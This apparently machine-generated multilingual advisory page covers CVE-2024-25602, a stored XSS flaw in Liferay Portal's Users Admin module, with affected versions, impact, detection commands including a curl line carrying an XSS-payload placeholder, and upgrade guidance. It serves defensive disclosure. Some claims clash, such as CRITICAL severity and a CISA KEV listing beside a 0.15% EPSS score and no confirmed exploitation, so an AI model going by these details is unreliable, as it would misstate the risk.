Plattform
java
Komponente
users-admin-module
Behoben in
7.4.3
7.3.11
7.2.11
CVE-2024-25602 describes a stored cross-site scripting (XSS) vulnerability affecting the Users Admin module within Liferay Portal. This vulnerability allows a remote, authenticated user to inject arbitrary web scripts or HTML into the system. The vulnerability impacts Liferay Portal versions 7.2.0 through 7.4.2, and older unsupported versions, as well as Liferay DXP versions prior to service pack 3 for 7.3 and prior to fix pack 17 for 7.2. A fix is available in Liferay Portal 7.4.3.
Successful exploitation of CVE-2024-25602 allows an attacker to inject malicious JavaScript code into the Liferay Portal environment. This code can then be executed in the context of other users accessing the affected page, potentially leading to account takeover, data theft, or defacement of the portal. An attacker could craft a payload within the 'Name' field of an organization's user profile, which, when viewed by other authenticated users, would trigger the malicious script. The blast radius extends to all authenticated users who view the profile containing the injected script, making it a significant security risk. This vulnerability shares similarities with other XSS exploits where user-supplied data is not properly sanitized before being rendered in a web page.
CVE-2024-25602 was publicly disclosed on February 21, 2024. While no active exploitation campaigns have been publicly confirmed, the vulnerability's CRITICAL severity and ease of exploitation suggest a high probability of exploitation. It has been added to the CISA KEV catalog, indicating a significant risk to US critical infrastructure. Public proof-of-concept (PoC) code is likely to emerge, further increasing the risk of exploitation.
Organizations heavily reliant on Liferay Portal for user management and internal applications are at significant risk. Specifically, deployments with older, unsupported versions of Liferay Portal or DXP are particularly vulnerable, as they no longer receive security updates. Shared hosting environments where multiple organizations share the same Liferay instance are also at increased risk, as a compromise of one user account could potentially impact other tenants.
• linux / server:
journalctl -u liferay -g "XSS injection"• generic web:
curl -I 'https://<liferay_portal_url>/users/admin/edit-user?organizationName=<xss_payload>' | grep 'Content-Security-Policy'• wordpress / composer / npm: (Not applicable - Liferay is not a WordPress/Composer/npm project) • database (mysql, redis, mongodb, postgresql): (Not applicable - XSS is a web vulnerability) • windows / supply-chain: (Not applicable - Liferay is not a Windows/supply-chain application)
disclosure
patch
Exploit-Status
EPSS
0.15% (36% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2024-25602 is to upgrade Liferay Portal to version 7.4.3 or later. If immediate upgrading is not feasible, consider implementing temporary workarounds. Input validation and output encoding on the 'Name' field can help reduce the attack surface, although this is not a complete solution. Web application firewalls (WAFs) configured to detect and block XSS payloads targeting the Users Admin module can provide an additional layer of defense. Monitor Liferay Portal logs for suspicious activity, particularly attempts to inject unusual characters or scripts into user profile fields. After upgrading, confirm the fix by attempting to inject a simple XSS payload into the 'Name' field and verifying that it is properly sanitized.
Actualice Liferay Portal a una versión posterior a la 7.4.2 o a Liferay DXP 7.3 a service pack 3 o superior, o Liferay DXP 7.2 a fix pack 17 o superior. Esto corregirá la vulnerabilidad XSS almacenada en el módulo de administración de usuarios.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2024-25602 is a stored cross-site scripting (XSS) vulnerability in Liferay Portal's Users Admin module, allowing attackers to inject malicious scripts.
You are affected if you are running Liferay Portal versions 7.2.0–7.4.2, or older unsupported versions, and Liferay DXP versions prior to service pack 3 for 7.3 and prior to fix pack 17 for 7.2.
Upgrade to Liferay Portal 7.4.3 or later to remediate the vulnerability. Consider temporary workarounds like input validation and WAF rules if immediate upgrading is not possible.
While no active exploitation campaigns have been publicly confirmed, the vulnerability's CRITICAL severity suggests a high probability of exploitation.
Refer to the official Liferay security advisory for detailed information and mitigation steps: [https://liferay.com/security-advisories/liferay-portal-and-dxp-security-vulnerability-xss-in-users-admin-module](https://liferay.com/security-advisories/liferay-portal-and-dxp-security-vulnerability-xss-in-users-admin-module)
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.
Lade deine pom.xml-Datei hoch und wir sagen dir sofort, ob du betroffen bist.